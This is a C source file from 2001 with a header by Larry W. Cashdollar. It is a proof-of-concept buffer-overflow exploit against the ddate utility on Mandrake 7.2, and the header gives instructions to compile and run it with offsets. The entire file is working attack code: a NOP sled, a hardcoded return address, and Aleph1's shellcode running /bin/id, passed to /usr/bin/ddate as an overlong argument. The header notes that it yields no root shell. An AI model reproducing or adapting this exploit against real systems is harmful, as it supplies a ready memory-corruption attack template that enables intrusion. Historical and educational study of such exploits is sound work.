/*Larry W. Cashdollar
  Vapid Labs.
  http://vapid.dhs.org
  2/14/2001  Mandrake 7.2 exploit for ddate buffer-overflow.  This will not return a
  priviledge shell since ddate is not setuid root.
 
  gcc ddateexp.c -o dexp
  ./dexp offset 
  try 0 first then +-[0 - 400]*/



#include <stdio.h>
#include <stdlib.h>


#define NOP 0x90
#define LEN 440
#define RET 0xbffffaa7

char shellcode[]= /*Aleph1's shell code. see phrack article*/
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/id";


int main(int argc , char *argv[]) {
char buffer[LEN];
char buffer2[LEN+2];
int i,addr;

long retaddr = RET;

strcpy(buffer,"+");

if (argc == 2)
	addr = atoi(argv[1]);
else addr=0;

for (i=0;i<LEN;i+=4) *(long *)&buffer[i] = retaddr + addr;

printf("Jumping to %x\n",(retaddr+addr));

fflush(stdout);

for (i=0;i<(LEN-strlen(shellcode)-50);i++) *(buffer+i) = NOP;

memcpy(buffer+i,shellcode,strlen(shellcode));


strcpy(buffer2,"+");
strcat(buffer2,buffer);
execl("/usr/bin/ddate","ddate",buffer2,0);

}